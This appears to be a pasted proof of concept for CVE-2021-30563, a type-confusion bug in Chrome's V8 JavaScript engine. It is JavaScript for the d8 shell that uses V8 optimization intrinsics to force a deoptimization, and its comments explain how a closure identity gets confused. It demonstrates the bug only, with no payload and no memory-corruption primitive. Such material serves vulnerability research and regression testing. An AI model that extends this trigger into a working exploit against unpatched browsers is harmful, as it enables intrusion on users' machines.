
PoC CVE-2021-30563 - Type Confusion in V8

a guest
Jul 30th, 2021
  1. // PoC CVE-2021-30563 - Type Confusion in V8
  2. // https://twitter.com/Zeusb0x
  3.  
  4. // r --allow-natives-syntax
  5.  
// Builds and returns a fresh closure from the same function literal every
// time it is called. The closure body refers to two free variables,
// `shClosure` and `temp`, which are assigned as globals further down, after
// the first make() call. Per the test comments below, closures produced
// here can end up sharing one optimized code object, which is the condition
// this regression test exercises.
function make() {
    const foo = function(x) {
        // Single-element array holding the global closure `shClosure`; the
        // comments below describe this as the captured object whose slot is
        // mis-translated during deoptimization.
        var ab = [shClosure];
        // Branch that the warm-up calls below deliberately never take, so the
        // optimized code has no feedback for it; calling with x > 10 later
        // forces the deoptimization.
        if (x > 10) {
            temp[0] = 1;
        }
        // Under plain JS semantics this can only be true, since ab[0] was
        // just initialized to shClosure. A false result means the closure
        // identity was confused (the CVE-2021-30563 behavior).
        return ab[0] === shClosure;
    };
    return foo;
}
  16.  
  17. // Build the first closure, with function context specialization
// Test driver. `shClosure`, `temp` and `fkClosure` are assigned without a
// declaration on purpose: the closure body returned by make() reads
// `shClosure` and `temp` as free variables, so they must exist as globals
// by the time a closure is executed.

// Build the first closure, with function context specialization.
make();
// Build and optimize a second closure.
shClosure = make();
temp = [1];

// Warm up only with x <= 10 so no feedback is collected for the `x > 10`
// branch. The %-prefixed calls are V8 runtime intrinsics and require the
// --allow-natives-syntax shell flag noted at the top of the file.
%PrepareFunctionForOptimization(shClosure);
shClosure(1);
%OptimizeFunctionOnNextCall(shClosure);
shClosure(2);

// Build a third closure. This will share the code object with the second closure.
fkClosure = make();
// Return value is evaluated to a constant true; expected output: true.
// (print() is assumed to be the d8 shell builtin — confirm for other hosts.)
print(fkClosure(1));
// Force deopt by taking the branch that had no feedback.
// In the process of translating the native frame to an interpreted one, the
// JSFunction stack slot is used to represent the closure in question (as part
// of a captured object).
// Because the code object is shared, ab[0] will evaluate to fkClosure instead
// of shClosure in the following call, so a comparison that should always be
// true yields false. That false is the observable symptom of the type
// confusion; a V8 build with the fix should print true here.
print(fkClosure(11)); // false